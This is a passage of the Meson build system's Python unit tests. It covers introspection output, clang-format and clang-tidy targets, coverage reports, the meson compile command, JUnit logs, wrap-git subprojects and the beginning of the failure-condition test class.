'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
